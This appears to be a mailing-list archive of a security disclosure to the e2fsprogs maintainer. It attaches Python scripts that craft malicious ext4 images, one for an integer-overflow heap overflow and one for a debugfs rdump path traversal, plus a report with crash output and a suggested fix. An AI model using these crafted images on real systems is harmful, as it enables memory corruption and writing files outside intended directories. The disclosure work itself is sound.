use the IOMAP_DIO_OVERWRITE_ONLY flag to upgrade to a write lock if needed.




* security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Feng Xue @ 2026-06-07 13:34 UTC
  To: tytso@mit.edu, tytso@alum.mit.edu; +Cc: linux-ext4@vger.kernel.org


[-- Attachment #1.1: Type: text/plain, Size: 129 bytes --]

Hi there,

I'd like to report two potential security bugs for your review.
detailed report and pocs attached.

Best,
Feng

[-- Attachment #1.2: Type: text/html, Size: 1255 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: craft_inode_overflow.py --]
[-- Type: text/x-python-script; name="craft_inode_overflow.py", Size: 13481 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers an integer overflow in
the inode_blocks_per_group calculation in lib/ext2fs/openfs.c:359-362.

Bug:
    fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                                   EXT2_INODE_SIZE(fs->super) +
                                   EXT2_BLOCK_SIZE(fs->super) - 1) /
                                  EXT2_BLOCK_SIZE(fs->super));

The multiplication s_inodes_per_group * s_inode_size is done in 32-bit
unsigned arithmetic. If the product exceeds 2^32, it silently wraps,
producing a small inode_blocks_per_group. This causes all inode table
boundary checks to use wrong bounds, leading to OOB access.

Strategy:
  - blocksize = 65536  (s_log_block_size = 6)
  - inode_size = 16384  (power of 2, >= 128, <= blocksize)
  - s_inodes_per_group = 0x40001 = 262145
  - product = 262145 * 16384 = 0x100004000 -> truncated to 0x4000 = 16384
  - inode_blocks_per_group = ceil(16384 / 65536) = 1  (should be 65537!)
  - Only 1 block (64K) of inode table is considered valid per group, but
    the fs claims 262145 inodes per group. Accessing any inode beyond the
    first 4 (65536/16384=4) triggers OOB reads from the inode table.
  - The inode bitmap check requires inodes_per_group/8 <= blocksize.
    262145/8 = 32768 <= 65536. Passes.

Crash chain (inode scan path):
  1. openfs.c:359: inode_blocks_per_group = 1 (should be 65537)
  2. inode.c:293: blocks_left = 1 (only 1 block of inode table is read)
  3. After 4 inodes, blocks_left = 0, but inodes_left = 262141
  4. get_next_blocks returns num_blocks=0, bytes_left=0
  5. inode.c:727-728: ptr += inode_size, bytes_left -= inode_size => -16384
  6. inode.c:659: memcpy(temp_buffer, ptr, bytes_left) with bytes_left = -16384
     => cast to size_t = huge value => heap buffer overflow

Trigger: debugfs crafted.img -R "lsdel"
         (any command that triggers ext2fs_open_inode_scan / get_next_inode)
"""

import struct
import sys
import os
import subprocess

# Superblock field offsets (from ext2_fs.h, all relative to superblock start)
OFF_INODES_COUNT       = 0x00   # __u32
OFF_BLOCKS_COUNT       = 0x04   # __u32
OFF_R_BLOCKS_COUNT     = 0x08   # __u32
OFF_FREE_BLOCKS_COUNT  = 0x0C   # __u32
OFF_FREE_INODES_COUNT  = 0x10   # __u32
OFF_FIRST_DATA_BLOCK   = 0x14   # __u32
OFF_LOG_BLOCK_SIZE     = 0x18   # __u32
OFF_LOG_CLUSTER_SIZE   = 0x1C   # __u32
OFF_BLOCKS_PER_GROUP   = 0x20   # __u32
OFF_CLUSTERS_PER_GROUP = 0x24   # __u32
OFF_INODES_PER_GROUP   = 0x28   # __u32
OFF_MAGIC              = 0x38   # __u16
OFF_STATE              = 0x3A   # __u16
OFF_REV_LEVEL          = 0x4C   # __u32
OFF_FIRST_INO          = 0x54   # __u32
OFF_INODE_SIZE         = 0x58   # __u16
OFF_FEATURE_COMPAT     = 0x5C   # __u32
OFF_FEATURE_INCOMPAT   = 0x60   # __u32
OFF_FEATURE_RO_COMPAT  = 0x64   # __u32
OFF_DESC_SIZE          = 0xFE   # __u16
OFF_LOG_GROUPS_PER_FLEX = 0x174 # __u8
OFF_CHECKSUM_TYPE      = 0x175  # __u8
OFF_BLOCKS_COUNT_HI    = 0x150  # __u32
OFF_RESERVED_GDT_BLOCKS = 0xCE # __u16

# Feature flags
EXT2_FEATURE_INCOMPAT_FILETYPE = 0x0002
EXT3_FEATURE_INCOMPAT_EXTENTS  = 0x0040
EXT4_FEATURE_INCOMPAT_64BIT    = 0x0080
EXT4_FEATURE_INCOMPAT_FLEX_BG  = 0x0200
EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER = 0x0001
EXT2_FEATURE_RO_COMPAT_LARGE_FILE   = 0x0002
EXT4_FEATURE_RO_COMPAT_HUGE_FILE    = 0x0008
EXT4_FEATURE_RO_COMPAT_GDT_CSUM     = 0x0010
EXT4_FEATURE_RO_COMPAT_DIR_NLINK    = 0x0020
EXT4_FEATURE_RO_COMPAT_EXTRA_ISIZE  = 0x0040
EXT4_FEATURE_RO_COMPAT_METADATA_CSUM = 0x0400
EXT2_FEATURE_COMPAT_EXT_ATTR   = 0x0008
EXT2_FEATURE_COMPAT_RESIZE_INODE = 0x0010
EXT2_FEATURE_COMPAT_DIR_INDEX  = 0x0020

EXT2_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024


def read_u32(data, off):
    return struct.unpack_from('<I', data, off)[0]

def read_u16(data, off):
    return struct.unpack_from('<H', data, off)[0]

def write_u32(data, off, val):
    struct.pack_into('<I', data, off, val & 0xFFFFFFFF)

def write_u16(data, off, val):
    struct.pack_into('<H', data, off, val & 0xFFFF)

def write_u8(data, off, val):
    struct.pack_into('<B', data, off, val & 0xFF)


def create_crafted_image(path, size_mb=128):
    """Create a crafted ext4 image from scratch (no mke2fs dependency).

    We write the superblock, group descriptor, and minimal structures
    directly to bypass any tool-level validation.
    """
    blocksize = 65536       # 64K blocks
    log_block_size = 6      # 1024 << 6 = 65536
    inode_size = 16384      # 16K inodes
    inodes_per_group = 0x40001  # 262145

    # 1 group with 1024 blocks. Total = 1024 * 64K = 64MB
    blocks_per_group = 1024
    first_data_block = 0
    blocks_count = blocks_per_group  # 1 group
    groups_cnt = 1
    inodes_count = groups_cnt * inodes_per_group  # 262145

    # Verify the overflow
    product = (inodes_per_group * inode_size) & 0xFFFFFFFF
    inode_blocks_per_group = (product + blocksize - 1) // blocksize
    correct_ibpg = (inodes_per_group * inode_size + blocksize - 1) // blocksize

    print("\n=== Overflow Analysis ===")
    print(f"  blocksize         = {blocksize}")
    print(f"  inode_size        = {inode_size}")
    print(f"  inodes_per_group  = {inodes_per_group} (0x{inodes_per_group:08X})")
    print(f"  true product      = {inodes_per_group * inode_size} (0x{inodes_per_group * inode_size:X})")
    print(f"  truncated product = {product} (0x{product:08X})")
    print(f"  inode_blocks_per_group (buggy)   = {inode_blocks_per_group}")
    print(f"  inode_blocks_per_group (correct) = {correct_ibpg}")
    print(f"  groups_cnt = {groups_cnt}")
    print(f"  inodes_count = {inodes_count}")

    # Verify openfs.c checks will pass:
    # 1. s_log_block_size <= 6
    assert log_block_size <= 6

    # 2. inode_size >= 128, <= blocksize, power of 2
    assert inode_size >= 128
    assert inode_size <= blocksize
    assert (inode_size & (inode_size - 1)) == 0

    # 3. blocks_per_group >= 8
    assert blocks_per_group >= 8

    # 4. blocks_per_group <= EXT2_MAX_BLOCKS_PER_GROUP = 65528
    assert blocks_per_group <= 65528

    # 5. inode_blocks_per_group <= EXT2_MAX_INODES_PER_GROUP
    max_ipg = 65536 - (blocksize // inode_size)  # 65536 - 4 = 65532
    assert inode_blocks_per_group <= max_ipg

    # 6. EXT2_DESC_PER_BLOCK = blocksize / 32 = 2048. Non-zero.
    assert (blocksize // 32) != 0

    # 7. first_data_block < blocks_count
    assert first_data_block < blocks_count

    # 8. groups_cnt < 2^32
    assert groups_cnt < (1 << 32)

    # 9. groups_cnt * inodes_per_group == inodes_count
    assert groups_cnt * inodes_per_group == inodes_count

    # 10. Bitmap check: inodes_per_group / 8 <= blocksize
    # The library check uses EXT2_INODES_PER_GROUP / 8 with C integer
    # division, so 262145 / 8 = 32768. A bitmap covering every inode would
    # need (262145 + 7) / 8 = 32769 bytes; both values are far below the
    # 65536-byte block size, so the check passes either way.
    inode_bitmap_bytes = inodes_per_group // 8
    assert inode_bitmap_bytes <= blocksize, \
        f"inode bitmap {inode_bitmap_bytes} > blocksize {blocksize}"

    print("  All validation checks pass!")

    # Create the image
    image_size = blocks_count * blocksize
    print(f"\n  Image size = {image_size} bytes ({image_size // (1024*1024)} MB)")
    data = bytearray(image_size)

    # === Write superblock at offset 1024 ===
    sb_off = SUPERBLOCK_OFFSET

    write_u32(data, sb_off + OFF_INODES_COUNT, inodes_count)
    write_u32(data, sb_off + OFF_BLOCKS_COUNT, blocks_count)
    write_u32(data, sb_off + OFF_R_BLOCKS_COUNT, 0)
    write_u32(data, sb_off + OFF_FREE_BLOCKS_COUNT, max(0, blocks_count - 6))
    write_u32(data, sb_off + OFF_FREE_INODES_COUNT, inodes_count - 11)
    write_u32(data, sb_off + OFF_FIRST_DATA_BLOCK, first_data_block)
    write_u32(data, sb_off + OFF_LOG_BLOCK_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_LOG_CLUSTER_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_BLOCKS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_CLUSTERS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_INODES_PER_GROUP, inodes_per_group)
    write_u16(data, sb_off + OFF_MAGIC, EXT2_SUPER_MAGIC)
    write_u16(data, sb_off + OFF_STATE, 1)  # EXT2_VALID_FS
    write_u32(data, sb_off + OFF_REV_LEVEL, 1)  # EXT2_DYNAMIC_REV
    write_u32(data, sb_off + OFF_FIRST_INO, 11)
    write_u16(data, sb_off + OFF_INODE_SIZE, inode_size)
    write_u16(data, sb_off + OFF_BLOCKS_COUNT_HI, 0)

    # Feature flags: minimal. No 64bit, no metadata_csum, no journal.
    feat_compat = 0  # nothing
    feat_incompat = EXT2_FEATURE_INCOMPAT_FILETYPE
    feat_ro_compat = (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER |
                      EXT2_FEATURE_RO_COMPAT_LARGE_FILE)

    write_u32(data, sb_off + OFF_FEATURE_COMPAT, feat_compat)
    write_u32(data, sb_off + OFF_FEATURE_INCOMPAT, feat_incompat)
    write_u32(data, sb_off + OFF_FEATURE_RO_COMPAT, feat_ro_compat)

    write_u16(data, sb_off + OFF_DESC_SIZE, 0)
    write_u8(data, sb_off + OFF_LOG_GROUPS_PER_FLEX, 0)
    write_u8(data, sb_off + OFF_CHECKSUM_TYPE, 0)
    write_u16(data, sb_off + OFF_RESERVED_GDT_BLOCKS, 0)

    # === Write Group Descriptor at block 1 ===
    # Block 0 contains the superblock (at offset 1024 within the block).
    # Block 1 is the group descriptor table.
    gdt_off = 1 * blocksize  # 65536
    # bg_block_bitmap: block 2
    # bg_inode_bitmap: block 3
    # bg_inode_table:  block 4 (only 1 block due to overflow!)
    struct.pack_into('<I', data, gdt_off + 0x00, 2)   # bg_block_bitmap
    struct.pack_into('<I', data, gdt_off + 0x04, 3)   # bg_inode_bitmap
    struct.pack_into('<I', data, gdt_off + 0x08, 4)   # bg_inode_table
    struct.pack_into('<H', data, gdt_off + 0x0C, max(0, blocks_count - 6))  # bg_free_blocks_count
    struct.pack_into('<H', data, gdt_off + 0x0E, min(inodes_count - 11, 65535))  # bg_free_inodes_count
    struct.pack_into('<H', data, gdt_off + 0x10, 2)   # bg_used_dirs_count
    struct.pack_into('<H', data, gdt_off + 0x12, 0)   # bg_flags

    # === Write a minimal root inode (inode 2) in the inode table ===
    # Inode table starts at block 4, offset = 4 * 65536 = 262144.
    # Inode 2 (root) is at index 1 (0-based), so offset = 262144 + 1 * 16384.
    # Inode 1 is special "bad blocks" inode.
    inode_table_off = 4 * blocksize
    root_inode_off = inode_table_off + 1 * inode_size  # inode 2

    # Minimal inode: directory, mode=0755
    i_mode = 0o40755  # S_IFDIR | 0755
    struct.pack_into('<H', data, root_inode_off + 0x00, i_mode)   # i_mode
    struct.pack_into('<H', data, root_inode_off + 0x02, 0)        # i_uid
    struct.pack_into('<I', data, root_inode_off + 0x04, blocksize) # i_size
    struct.pack_into('<H', data, root_inode_off + 0x1A, 2)        # i_links_count

    # Write the image
    with open(path, 'wb') as f:
        f.write(data)

    print(f"\nImage written to: {path}")
    return data


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output_image>")
        sys.exit(1)

    output_path = sys.argv[1]

    print("Creating crafted ext4 image with inode_blocks_per_group overflow...")
    data = create_crafted_image(output_path)

    # Print superblock verification
    print(f"\nSuperblock verification:")
    sb = data[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET+256]
    print(f"  s_inodes_count     = {struct.unpack_from('<I', sb, 0x00)[0]}")
    print(f"  s_blocks_count     = {struct.unpack_from('<I', sb, 0x04)[0]}")
    print(f"  s_first_data_block = {struct.unpack_from('<I', sb, 0x14)[0]}")
    print(f"  s_log_block_size   = {struct.unpack_from('<I', sb, 0x18)[0]}")
    print(f"  s_blocks_per_group = {struct.unpack_from('<I', sb, 0x20)[0]}")
    print(f"  s_inodes_per_group = {struct.unpack_from('<I', sb, 0x28)[0]} (0x{struct.unpack_from('<I', sb, 0x28)[0]:08X})")
    print(f"  s_magic            = 0x{struct.unpack_from('<H', sb, 0x38)[0]:04X}")
    print(f"  s_rev_level        = {struct.unpack_from('<I', sb, 0x4C)[0]}")
    print(f"  s_inode_size       = {struct.unpack_from('<H', sb, 0x58)[0]}")
    print(f"  s_feature_compat   = 0x{struct.unpack_from('<I', sb, 0x5C)[0]:08X}")
    print(f"  s_feature_incompat = 0x{struct.unpack_from('<I', sb, 0x60)[0]:08X}")
    print(f"  s_feature_ro_compat= 0x{struct.unpack_from('<I', sb, 0x64)[0]:08X}")

    # Show the overflow math
    ipg = struct.unpack_from('<I', sb, 0x28)[0]
    isz = struct.unpack_from('<H', sb, 0x58)[0]
    bsz = 1024 << struct.unpack_from('<I', sb, 0x18)[0]
    product_full = ipg * isz
    product_trunc = product_full & 0xFFFFFFFF
    ibpg_buggy = (product_trunc + bsz - 1) // bsz
    ibpg_correct = (product_full + bsz - 1) // bsz
    print(f"\n  Overflow demonstration:")
    print(f"    {ipg} * {isz} = {product_full} (0x{product_full:X})")
    print(f"    truncated to 32 bits = {product_trunc} (0x{product_trunc:X})")
    print(f"    inode_blocks_per_group (buggy)   = {ibpg_buggy}")
    print(f"    inode_blocks_per_group (correct) = {ibpg_correct}")
    print(f"    Ratio: buggy is {ibpg_correct / ibpg_buggy:.0f}x too small!")
    print(f"\n    With buggy value, only {ibpg_buggy * bsz // isz} inodes are")
    print(f"    addressable in the inode table, but the FS claims {ipg}.")
    print(f"    Any inode > {ibpg_buggy * bsz // isz} will cause an OOB read.")


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #3: craft_path_traversal.py --]
[-- Type: text/x-python-script; name="craft_path_traversal.py", Size: 5972 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers path traversal in
debugfs rdump.

Bug: debugfs/dump.c:265
  sprintf(fullname, "%s/%s", dumproot, name);

The 'name' comes from directory entries on the crafted filesystem.
If name contains "../" components, files are written outside the
intended dump directory.

Additionally, symlink targets are read from the filesystem (line 215/226)
and created on the host (line 242), allowing arbitrary symlink creation.

Usage:
  python3 craft_path_traversal.py output.img
  debugfs output.img -R "rdump / /tmp/safe_dir"
  # Result: file created at /tmp/traversal_proof (outside safe_dir)
"""

import struct
import sys
import subprocess


def create_base_image(path, size_mb=4):
    with open(path, 'wb') as f:
        f.write(b'\x00' * size_mb * 1024 * 1024)

    subprocess.run([
        'mke2fs', '-t', 'ext4', '-F',
        '-b', '1024',
        '-N', '128',
        '-O', '^has_journal,^extents',
        path
    ], check=True, capture_output=True)


def patch_traversal(img_path):
    """Add a directory entry with ../ in the name pointing to a regular file."""
    with open(img_path, 'r+b') as f:
        # Read superblock
        f.seek(1024)
        sb = f.read(1024)
        s_log_block_size = struct.unpack_from('<I', sb, 24)[0]
        s_inode_size = struct.unpack_from('<H', sb, 88)[0]
        s_inodes_per_group = struct.unpack_from('<I', sb, 40)[0]
        block_size = 1024 << s_log_block_size

        # Read group descriptor
        gd_offset = block_size * 2 if block_size == 1024 else block_size
        f.seek(gd_offset)
        gd = f.read(64)
        inode_table_block = struct.unpack_from('<I', gd, 8)[0]
        inode_table_offset = inode_table_block * block_size

        # Use inode 12 for a regular file with content
        target_ino = 12
        target_offset = inode_table_offset + (target_ino - 1) * s_inode_size
        f.seek(target_offset)
        inode_data = bytearray(f.read(s_inode_size))

        # Set as regular file (mode 0100644)
        struct.pack_into('<H', inode_data, 0, 0o100644)
        struct.pack_into('<H', inode_data, 2, 0)  # uid

        # File content goes in a separate data block referenced by i_block[0]
        # (allocated below); it is not stored inline in the inode.
        content = b'TRAVERSAL_PROOF: file written outside dump directory\n'
        struct.pack_into('<I', inode_data, 4, len(content))  # i_size
        struct.pack_into('<H', inode_data, 26, 1)  # i_links_count

        # Allocate a data block for the file content
        # Use block 100 (should be free in a small fs)
        data_block = 100
        struct.pack_into('<I', inode_data, 40, data_block)  # i_block[0]
        struct.pack_into('<I', inode_data, 28, 2)  # i_blocks (in 512-byte sectors)

        f.seek(target_offset)
        f.write(inode_data)

        # Write content to the data block
        f.seek(data_block * block_size)
        f.write(content + b'\x00' * (block_size - len(content)))

        # Now add a directory entry in root with name "../../tmp/traversal_proof"
        # This will cause rdump to write outside the dump directory
        root_offset = inode_table_offset + (2 - 1) * s_inode_size
        f.seek(root_offset)
        root_inode = bytearray(f.read(s_inode_size))
        root_block = struct.unpack_from('<I', root_inode, 40)[0]

        dir_offset = root_block * block_size
        f.seek(dir_offset)
        dir_data = bytearray(f.read(block_size))

        # Find last entry and add our traversal entry
        pos = 0
        last_entry_pos = 0
        while pos < block_size:
            inode_num = struct.unpack_from('<I', dir_data, pos)[0]
            rec_len = struct.unpack_from('<H', dir_data, pos + 4)[0]
            if rec_len == 0:
                break
            if inode_num != 0:
                last_entry_pos = pos
            next_pos = pos + rec_len
            if next_pos >= block_size:
                break
            pos = next_pos

        last_rec_len = struct.unpack_from('<H', dir_data, last_entry_pos + 4)[0]
        last_name_len = dir_data[last_entry_pos + 6]
        actual_last_size = ((8 + last_name_len + 3) // 4) * 4
        remaining = last_rec_len - actual_last_size

        # Path traversal name - goes up from /tmp/out3 to /tmp/
        entry_name = b'../../tmp/traversal_proof'
        new_entry_size = ((8 + len(entry_name) + 3) // 4) * 4

        if remaining >= new_entry_size:
            struct.pack_into('<H', dir_data, last_entry_pos + 4, actual_last_size)
            new_pos = last_entry_pos + actual_last_size
            struct.pack_into('<I', dir_data, new_pos, target_ino)
            struct.pack_into('<H', dir_data, new_pos + 4, remaining)
            dir_data[new_pos + 6] = len(entry_name)
            dir_data[new_pos + 7] = 1  # file_type = regular
            dir_data[new_pos + 8:new_pos + 8 + len(entry_name)] = entry_name

            f.seek(dir_offset)
            f.write(dir_data)
            print(f"Added traversal dir entry: '{entry_name.decode()}' -> inode {target_ino}")
        else:
            print(f"Not enough space (need {new_entry_size}, have {remaining})")
            sys.exit(1)

        # Mark inode 12 as used in bitmap
        inode_bitmap_block = struct.unpack_from('<I', gd, 4)[0]
        f.seek(inode_bitmap_block * block_size)
        bitmap = bytearray(f.read(block_size))
        byte_idx = (target_ino - 1) // 8
        bit_idx = (target_ino - 1) % 8
        bitmap[byte_idx] |= (1 << bit_idx)
        f.seek(inode_bitmap_block * block_size)
        f.write(bitmap)

        print(f"Patched image with path traversal entry")
        print(f"Trigger: debugfs {img_path} -R 'rdump / /tmp/out3'")
        print(f"Expected: file created at /tmp/traversal_proof (outside /tmp/out3)")


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output.img>")
        sys.exit(1)

    output = sys.argv[1]
    create_base_image(output)
    patch_traversal(output)


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #4: REPORT-inode-blocks-overflow.md --]
[-- Type: text/markdown; name="REPORT-inode-blocks-overflow.md", Size: 7015 bytes --]

# e2fsprogs: Integer overflow in inode_blocks_per_group causes heap buffer overflow

## Summary

A 32-bit integer overflow in `ext2fs_open2()` when computing
`inode_blocks_per_group` from untrusted superblock fields allows a
crafted filesystem image to cause a heap buffer overflow in any
libext2fs consumer that scans inodes (debugfs, dumpe2fs, fuse2fs, etc.).

## Affected Component

- File: `lib/ext2fs/openfs.c`, lines 359-362
- Downstream crash: `lib/ext2fs/inode.c`, line 659
- Versions: all current versions including 1.47.4
- Affected tools: `debugfs`, `dumpe2fs`, `fuse2fs`, `e2image`, and any
  program using `ext2fs_open()` + inode scanning. Note: `e2fsck` has an
  additional `check_super_value` guard that catches this, so e2fsck is
  NOT affected.

## Severity

**High** — Heap buffer overflow (memcpy with negative/huge size) leading
to crash. Potential code execution with a carefully crafted image.

## Root Cause

In `ext2fs_open2()`, the inode table size per group is computed as:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

`EXT2_INODES_PER_GROUP` is `s_inodes_per_group` (`__u32`) and
`EXT2_INODE_SIZE` is `s_inode_size` (`__u16` promoted to `int`). Under
C's usual arithmetic conversions, the multiplication is performed in
`unsigned int` (32-bit), silently truncating any product that does not
fit in 32 bits (2^32 or larger).

The validation at line 397 compares the already-truncated value:
```c
fs->inode_blocks_per_group > EXT2_MAX_INODES_PER_GROUP(fs->super)
```
This passes because the truncated value is small.
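
The truncation and the bypassed check can be reproduced outside of C
with a short Python sketch. Masking with `0xFFFFFFFF` stands in for
`unsigned int` wraparound; the helper names `ibpg_32bit` and
`ibpg_exact` are made up for this illustration, and the limit uses the
same `65536 - inodes_per_block` expression as the attached PoC script.

```python
MASK32 = 0xFFFFFFFF  # emulates 32-bit unsigned wraparound


def ibpg_32bit(inodes_per_group, inode_size, block_size):
    """Hypothetical helper: mimic the 32-bit computation described above."""
    product = (inodes_per_group * inode_size) & MASK32
    return ((product + block_size - 1) & MASK32) // block_size


def ibpg_exact(inodes_per_group, inode_size, block_size):
    """Same formula with unbounded integers (the intended result)."""
    return (inodes_per_group * inode_size + block_size - 1) // block_size


ipg, isz, bs = 262145, 16384, 65536
max_ipg = 65536 - bs // isz       # limit for this geometry, as in the PoC
buggy = ibpg_32bit(ipg, isz, bs)
exact = ibpg_exact(ipg, isz, bs)

print(buggy, exact)                       # 1 65537
print(buggy > max_ipg, exact > max_ipg)   # False True
```

Only the exact value trips the limit; the truncated value of 1 passes.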

## Crash Chain

With `s_inodes_per_group = 262145` and `s_inode_size = 16384`:

1. **openfs.c:359**: `262145 * 16384 = 0x100004000` truncates to
   `0x4000 = 16384`. Result: `inode_blocks_per_group = 1` (should be
   65537).

2. **inode.c:293**: Inode scan sets `blocks_left = 1`, reads only 1
   block (4 inodes worth of data).

3. **inode.c:727**: After exhausting the buffer, `bytes_left -= inode_size`
   produces `bytes_left = -16384`.

4. **inode.c:659**: `memcpy(temp_buffer, ptr, bytes_left)` — `bytes_left`
   is `int`, cast to `size_t` becomes ~2^64 - 16384 → **massive heap
   buffer overflow**.
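
The arithmetic in steps 2 to 4 can be modelled in a few lines of
Python. This is a simplified model of the byte accounting only, not the
control flow of `inode.c`; the variable names are illustrative, and the
modulo by 2^64 stands in for the `int` to `size_t` conversion on a
64-bit platform.

```python
inode_size, block_size = 16384, 65536

# Step 2: only one block is buffered because inode_blocks_per_group == 1.
bytes_left = 1 * block_size

# Consume the inodes that really are present in the buffer.
inodes_read = 0
while bytes_left > 0:
    bytes_left -= inode_size
    inodes_read += 1

# Step 3: one more decrement after the buffer is exhausted.
bytes_left -= inode_size

# Step 4: a negative int converted to a 64-bit size_t.
as_size_t = bytes_left % (1 << 64)

print(inodes_read, bytes_left, hex(as_size_t))
# 4 -16384 0xffffffffffffc000
```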

## Proof of Concept

### ASAN crash output

```
==8==ERROR: AddressSanitizer: negative-size-param: (size=-16384)
    #0 __interceptor_memcpy
    #1 memcpy /usr/include/aarch64-linux-gnu/bits/string_fortified.h:29
    #2 ext2fs_get_next_inode_full /src/lib/ext2fs/inode.c:659
    #3 ext2fs_get_next_inode /src/lib/ext2fs/inode.c:749
    #4 do_lsdel /src/debugfs/lsdel.c:182
```

### Reproduction

```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker run --rm e2fsprogs-repro bash -c \
  'python3 /work/repro/craft_inode_overflow.py /work/t.img && \
   /src/debugfs/debugfs /work/t.img -R lsdel'
```

### PoC script

```python
#!/usr/bin/env python3
"""
Craft ext4 image that triggers inode_blocks_per_group integer overflow.

The key insight: s_inodes_per_group * s_inode_size must overflow 32 bits
while individually passing all validation checks in ext2fs_open2().

Values used:
  blocksize = 65536 (s_log_block_size = 6)
  s_inode_size = 16384 (power of 2, <= blocksize)
  s_inodes_per_group = 262145 (0x40001)
  Product: 262145 * 16384 = 0x100004000 → truncates to 0x4000
  inode_blocks_per_group = 1 (should be 65537)
"""
import struct
import sys

def main():
    path = sys.argv[1]
    
    BLOCKSIZE = 65536
    LOG_BLOCK_SIZE = 6
    INODE_SIZE = 16384
    INODES_PER_GROUP = 262145
    BLOCKS_PER_GROUP = 1024
    BLOCKS_COUNT = 1024
    FIRST_DATA_BLOCK = 0
    GROUPS_COUNT = 1
    INODES_COUNT = INODES_PER_GROUP * GROUPS_COUNT
    DESC_SIZE = 32

    img_size = BLOCKS_COUNT * BLOCKSIZE
    img = bytearray(img_size)

    # --- Superblock at offset 1024 ---
    sb_off = 1024
    struct.pack_into('<I', img, sb_off + 0, INODES_COUNT)       # s_inodes_count
    struct.pack_into('<I', img, sb_off + 4, BLOCKS_COUNT)       # s_blocks_count_lo
    struct.pack_into('<I', img, sb_off + 24, LOG_BLOCK_SIZE)    # s_log_block_size
    struct.pack_into('<I', img, sb_off + 28, LOG_BLOCK_SIZE)    # s_log_cluster_size
    struct.pack_into('<I', img, sb_off + 32, BLOCKS_PER_GROUP)  # s_blocks_per_group
    struct.pack_into('<I', img, sb_off + 36, BLOCKS_PER_GROUP)  # s_clusters_per_group
    struct.pack_into('<I', img, sb_off + 40, INODES_PER_GROUP)  # s_inodes_per_group
    struct.pack_into('<H', img, sb_off + 56, 0xEF53)            # s_magic
    struct.pack_into('<H', img, sb_off + 58, 1)                 # s_state = VALID
    struct.pack_into('<H', img, sb_off + 62, 1)                 # s_minor_rev_level
    struct.pack_into('<I', img, sb_off + 76, 1)                 # s_rev_level = DYNAMIC
    struct.pack_into('<H', img, sb_off + 88, INODE_SIZE)        # s_inode_size
    struct.pack_into('<I', img, sb_off + 96, 0x0002)            # s_feature_incompat = FILETYPE
    struct.pack_into('<I', img, sb_off + 100, 0x0003)           # s_feature_ro_compat
    struct.pack_into('<I', img, sb_off + 20, FIRST_DATA_BLOCK)  # s_first_data_block
    struct.pack_into('<H', img, sb_off + 254, DESC_SIZE)        # s_desc_size

    # --- Group descriptor at block 1 ---
    gd_off = BLOCKSIZE
    inode_table_block = 3
    struct.pack_into('<I', img, gd_off + 0, 2)                  # bg_block_bitmap
    struct.pack_into('<I', img, gd_off + 4, 2)                  # bg_inode_bitmap
    struct.pack_into('<I', img, gd_off + 8, inode_table_block)  # bg_inode_table

    with open(path, 'wb') as f:
        f.write(img)

    product = INODES_PER_GROUP * INODE_SIZE
    truncated = product & 0xFFFFFFFF
    buggy_ibpg = (truncated + BLOCKSIZE - 1) // BLOCKSIZE
    correct_ibpg = (product + BLOCKSIZE - 1) // BLOCKSIZE

    print(f"Image: {path} ({img_size} bytes)")
    print(f"  {INODES_PER_GROUP} * {INODE_SIZE} = {product} (0x{product:X})")
    print(f"  Truncated to 32-bit: {truncated} (0x{truncated:X})")
    print(f"  inode_blocks_per_group: {buggy_ibpg} (should be {correct_ibpg})")
    print(f"Trigger: debugfs {path} -R lsdel")

if __name__ == '__main__':
    main()
```

## Suggested Fix

Use 64-bit arithmetic for the multiplication:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = (((unsigned long long)
                               EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

Additionally, add a validation check after the computation:

```c
if ((__u64)EXT2_INODES_PER_GROUP(fs->super) * EXT2_INODE_SIZE(fs->super)
    > (__u64)fs->inode_blocks_per_group * EXT2_BLOCK_SIZE(fs->super)) {
    retval = EXT2_ET_CORRUPT_SUPERBLOCK;
    goto cleanup;
}
```
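
For triaging images before handing them to an unpatched tool, the same
condition can be tested from a raw superblock. The sketch below is an
assumption-laden illustration, not part of e2fsprogs: the function
names are hypothetical, the field offsets (24, 40, 88) are the ones
used by the PoC scripts, and it ignores revision-0 filesystems, where
the inode size is fixed rather than read from `s_inode_size`.

```python
import struct

U32_MAX = 0xFFFFFFFF


def inode_table_size_overflows(sb: bytes) -> bool:
    """Return True if the 32-bit inode_blocks_per_group expression would wrap.

    `sb` is the superblock as read from byte offset 1024 of the image.
    """
    log_block_size = struct.unpack_from('<I', sb, 24)[0]
    inodes_per_group = struct.unpack_from('<I', sb, 40)[0]
    inode_size = struct.unpack_from('<H', sb, 88)[0]
    block_size = 1024 << log_block_size
    # The rounding term is included because the sum, not only the
    # product, has to fit in 32 bits.
    return inodes_per_group * inode_size + block_size - 1 > U32_MAX


def make_sb(log_block_size, inodes_per_group, inode_size):
    """Build a mostly empty superblock for demonstration purposes."""
    sb = bytearray(1024)
    struct.pack_into('<I', sb, 24, log_block_size)
    struct.pack_into('<I', sb, 40, inodes_per_group)
    struct.pack_into('<H', sb, 88, inode_size)
    return bytes(sb)


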